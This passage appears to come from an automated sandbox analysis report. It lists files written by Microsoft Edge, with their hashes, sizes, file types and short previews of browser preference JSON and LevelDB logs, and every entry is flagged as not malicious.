                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40504
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561433778529403
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WUxl/V7pLGLh2YWPrXfnd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVCHgXWKsrws6Pxf:WUxl/jch2YWPrXfndu1jafHgmKFs6Py0
                                                                                                                                                                                                                                                                                                  MD5:B7F5AA93176187EBC640121E430E413F
                                                                                                                                                                                                                                                                                                  SHA1:96E60D488455461C8792817057F50938DCA7845E
                                                                                                                                                                                                                                                                                                  SHA-256:C993241C957A33F99B6CC8B7CE8DDBA9AF5D9FAE09BDD4D2C2493A8413F6B6B0
                                                                                                                                                                                                                                                                                                  SHA-512:8169920184EDAF80B8CD88A7DA061989DC6881A0DBC13C3438627446F7866095B15595D86B43FBA2EC70B518C5EBEC83C571B8FA82576D60F545F6833B23AD27
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17518), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17519
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.493141768502774
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:st3PGKSu4os4hfh+7qpb3ywsbG7Qwp6WuaTYf:slOxuHhfkKWbGUiyaTYf
                                                                                                                                                                                                                                                                                                  MD5:AC4D8AFD8D481FED2D2842DD7BB52E9E
                                                                                                                                                                                                                                                                                                  SHA1:2B3963D9D4B937AE9148286FA09E41FCD94BA5C9
                                                                                                                                                                                                                                                                                                  SHA-256:E8BB0A1D7B30AD0E555BB63E6C1D62529E8B925F17F6A3DB4DB388EDD2FA5BC0
                                                                                                                                                                                                                                                                                                  SHA-512:7540F197A0144973D5E56663B2B0A0DD57D83D4C4F441B170F42FE10C097832E190B7EA08B75BD0F8D4007EC749B5B2311F914666C6E533CD2F44DE1E240C8EC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.566358911446204
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WZzljYWPrXfGd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuXWVsrwjypRtu5:WZzljYWPrXfGdu1jaPmVFwt2
                                                                                                                                                                                                                                                                                                  MD5:A956E0076959A92FE6BA2186DAF41D72
                                                                                                                                                                                                                                                                                                  SHA1:0F5FB90FE215BB72A3CA26CB186107176860E1FF
                                                                                                                                                                                                                                                                                                  SHA-256:DC99216303DAC945AC9E7E28C621A62088CAC185C081A78DA213963A7174E669
                                                                                                                                                                                                                                                                                                  SHA-512:3CF6A92D93DD8F2DEB6E00521522FED1CBC95039660A2697A464D747D4F6D6C086E1DCA221E75E8B10979A9CCF6522057A96C3557C673EC95D69806C318D4743
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):307
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.217672965600347
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:tQ2s1923oH+Tcwtp3hBtB2KLlzoF0N9+q2P923oH+Tcwtp3hBWsIFUv:fYebp3dFLv+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                                  MD5:4FFA89A635589FFF012D259F03A67906
                                                                                                                                                                                                                                                                                                  SHA1:8B1FC45DBBBEA62BE7DD19B4901FAD6405230066
                                                                                                                                                                                                                                                                                                  SHA-256:3818E9A3482AE784B59B71D40B8BBAAA230BA8B42AA648F021AB4F28BC568A3A
                                                                                                                                                                                                                                                                                                  SHA-512:15A44327FA13DDC33CE0B887EE1A535AF34E893844639E372920BC7D504DD88BF4E9DD68FB87B163232A8B0DF4D59DE95C80AB01B22BE2E017BE7D5C17ADDA29
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:25.440 99c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/23-00:24:25.470 99c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.222867265681474
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:v+/PN8FpfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Xfx2mjF
                                                                                                                                                                                                                                                                                                  MD5:A9738AEEC89E5EB423C35AC886BB6636
                                                                                                                                                                                                                                                                                                  SHA1:6BDD095B8C3C48819956E2788100708E870F3E81
                                                                                                                                                                                                                                                                                                  SHA-256:22761E3D8AED809644B9464B63F3046B7EA1EA2406E28C7A5C4AF5534838AA09
                                                                                                                                                                                                                                                                                                  SHA-512:848258C7CE97BC63AB92674459D0C2A489119EEAE35D95AFEA6F3A015025663FCFD1CBBD20A31B94B0A0852DB45C90CAFA0DB6A832D82E5636072122BEB0946A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1033698608709965
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:S+q2P923oH+Tcwt9Eh1tIFUt8OjZmw+nVkwO923oH+Tcwt9Eh15LJ:S+v4Yeb9Eh16FUt8c/+nV5LYeb9Eh1VJ
                                                                                                                                                                                                                                                                                                  MD5:F14A4245171EDAC7DA6C052438933626
                                                                                                                                                                                                                                                                                                  SHA1:C789D90FEF37C2B29AFF7EBB363F6105E0CA749A
                                                                                                                                                                                                                                                                                                  SHA-256:AD63ABFF469F56B0408B11B08D51119E7D8104E542D6C1FE46F638A68468F007
                                                                                                                                                                                                                                                                                                  SHA-512:0972A8D3A37C92237BDA02F45CAE5AF13804BD5DF4373A6F843BF1FC5D42D0AED6C6C3B8394E8FB838D86E956F35E0CF604E30ED546B03BF0550F9477FDE8F97
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.337 bbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-00:24:26.341 bbc Recovering log #3.2024/12/23-00:24:26.391 bbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46319446808903936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5GV:TouQq3qh7z3bY2LNW9WMcUvBuUV
                                                                                                                                                                                                                                                                                                  MD5:E258EBC3455F64E3754694333E086FF4
                                                                                                                                                                                                                                                                                                  SHA1:27432F5A98F3A8C6A580A146C2F90EB21901072A
                                                                                                                                                                                                                                                                                                  SHA-256:40106890103D5AC3EB609E7D2A2A658D35B30A70D4DFEB51C291C680CF1F4AC1
                                                                                                                                                                                                                                                                                                  SHA-512:55B05CCB0CF0F4208CE51B8E8ABD4E45F2B586A4A58BF03867ECD7A79FCD07975EEBBDBBF709542F58F69ADE70606CC1AF88E1EDDFFBE0EB532E20C952FBB535
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):348
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1285157050283425
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:L8d3+q2P923oH+TcwtnG2tMsIFUt8KzZZmw+KzNVkwO923oH+TcwtnG2tMsLJ:oOv4Yebn9GFUt8KN/+K/5LYebn95J
                                                                                                                                                                                                                                                                                                  MD5:1AB0FF499DF0E7AFFD79E394908AB4B1
                                                                                                                                                                                                                                                                                                  SHA1:B12C5E4E8702C201F15A14290085345E54A7126C
                                                                                                                                                                                                                                                                                                  SHA-256:B1FB05BBD730189996EC8A528BDBC35EB1BC23178E8077FEE5EFBCFEF7C16544
                                                                                                                                                                                                                                                                                                  SHA-512:B739970C6BAFFA3045D055AF7EDD225CB9AFDE66D389E75BD2E45FB1E8D9E698A9F540E62640E3B030CB8763A30EC7E20E6910928578B4DBC8FE2BF939D05067
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:19.999 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-00:24:20.000 1c18 Recovering log #3.2024/12/23-00:24:20.000 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6141786893107009
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j/7D/pN7DLmL:TO8D4jJ/6Up+nfE
                                                                                                                                                                                                                                                                                                  MD5:D6B6383AA51F75EC2DC5997E2D976522
                                                                                                                                                                                                                                                                                                  SHA1:665346ED9537785C8D47833F0C1711F22E71EA24
                                                                                                                                                                                                                                                                                                  SHA-256:01F615D08FDC775B7AFDBBC1818A87972984E4226427F216AC0A5003AF97E1E1
                                                                                                                                                                                                                                                                                                  SHA-512:C57A995935A468AEF966AE03AD7E79F695DCA13D09C6F03F32AF5EC30472D97BB5F541A063A58AA0AC96F135BBD924A3BE0C319C00CE749F1A63D796F7D147AD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354138250226695
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:PA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:PFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                  MD5:D05C4351F899FF00E3DD3C4597AACC3B
                                                                                                                                                                                                                                                                                                  SHA1:90DEC0CE73CF6B2054F502DF31FA1B508A403C01
                                                                                                                                                                                                                                                                                                  SHA-256:C8F2BEB5497F5C78C12F1CC7DB5E78ABD0ECF1326CD6D9109A22286A559F7817
                                                                                                                                                                                                                                                                                                  SHA-512:E95E57AC56ADDDE6C2C705861D383C6AEE4D8732F94332E0EA3D20D7A11EDF2A46F9FC51978596A455CAAF69BFBD8473086A0790569E60E73BA2520704F14346
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1...Wq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379405069183634..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.125556318926299
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:4D1923oH+Tcwtk2WwnvB2KLlpO+q2P923oH+Tcwtk2WwnvIFUv:VYebkxwnvFLXO+v4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                  MD5:F39D016B9637B3538D264E57E8F5F466
                                                                                                                                                                                                                                                                                                  SHA1:38A71F5FC51BB1A4D3B94219668F4BEC5666FDF0
                                                                                                                                                                                                                                                                                                  SHA-256:FBB68497C3E4D9ABAA8A40668864347C1C78E243D814A572452657B910810B7E
                                                                                                                                                                                                                                                                                                  SHA-512:454943960493EA3C93A18D0FAFB46A5095AD3366946717EE42811F5B26897C4C89CE975CBC441CB26A890FE67E010D834BF516EFACD20791E84C5905F6793DC8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.402 43c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/23-00:24:26.909 43c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3246181074482
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rc:C1gAg1zfvU
                                                                                                                                                                                                                                                                                                  MD5:0B9FF85DAE00EB0CBEE7C00430F37132
                                                                                                                                                                                                                                                                                                  SHA1:B24982D06049CCB31F9CD65EEA418AB0B4452034
